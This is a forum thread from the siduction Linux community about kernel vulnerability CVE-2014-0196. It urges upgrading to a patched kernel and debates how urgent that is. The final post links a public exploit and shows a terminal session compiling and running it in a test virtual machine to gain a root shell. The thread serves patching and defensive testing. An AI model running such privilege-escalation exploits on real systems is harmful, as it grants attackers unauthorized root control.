Hello dear siductians!
There is a CVE (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0196) for recent linux kernel: a race condition leads to DoS or privilege escalation.
If you want to take action please do a dist-upgrade or install linux-image-3.14-3.towo.2-siduction-[amd64|686|686-pae] and its headers.
You need to reboot into the new kernel.
Thanks towo` for quickly uploading a patched kernel. Well done!
greetings
musca
[Edit]
not affected kernel versions:
3.14-3.towo.2
3.14-4
3.15.rc5
@towo: Really very quick to respond to the error in the kernel. Good work!
Thank you Towo.
fix not available on the uni-stuttgart mirror at the moment, who want's to upgrade immediatly should use berlin.
habe ich den bug richtig verstanden? Diese lokale Sache? Ist Update-Panik da nich ein wenig fehl am Platz und eventuell übertrieben?
Please, don't panic.
Thanks towo, good work.
But melma(r)ker is right, don't panic, it's only localy triggerable, dude ;-)
But it seems, it is triggarabble if someone gets remote access as user (via a buggy webserver or the like. See here (german only, sorry (http://www.heise.de/newsticker/meldung/Schwachstelle-im-Linux-Kernel-Admin-Rechte-fuer-alle-2187501.html)): Kernels since 2.36.1-rc3 are affected!
Still, pached kernel very much appreciated!
(And if you don't find the kernel, it's 686, not i386 at the end of the name)
Hello,
Only few attacks do knock out the security by simple "remote code execution with root rights" in one step. Many attacks include a two step approach: First take control of users code execution, then gain root privilege.
Now imagine how hackers will prepare such attacks: They silently are developing their methods to activate their own code and then they are waiting for the opportunity to become root. Not patching a known privilege escalation bug makes it easier for them to attack their target systems.
I think the alert shows our responsiveness and as a result there is no panic.
Doing a dist-upgrade or installing a kernel is just standard procedure.
@michaa7, thanks for the hint, i'll update the name.
greetings
musca
Hello,
i was courious about the sample exploitcode (http://bugfuzz.com/stuff/cve-2014-0196-md.c) and tried it.
I created a snapshot of my virtualmachine, so i can easily delete the compromized state afterwards.
In the first attempt the virtual machine has frozen, but in the second attempt:
user@sidubox:~/cve$ gcc cve-2014-0196-md.c -lutil -lpthread
user@sidubox:~/cve$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: 0xffffffff8105e5bb
[+] Resolved prepare_kernel_cred: 0xffffffff8105e8af
[+] Doing once-off allocations
[+] Attempting to overflow into a tty_struct....
[+] Got it :)
root@sidubox:~/cve# whoami
root
root@sidubox:~/cve# id
uid=0(root) gid=0(root) Gruppen=0(root)
root@sidubox:~/cve# uname -a
Linux sidubox 3.14-3.towo-siduction-amd64 #1 SMP PREEMPT Tue May 6 20:46:12 UTC 2014 x86_64 GNU/Linux
root@sidubox:~/cve#
It took quite some some seconds of time.
Now reverting to the clean snapshot.
greetings
musca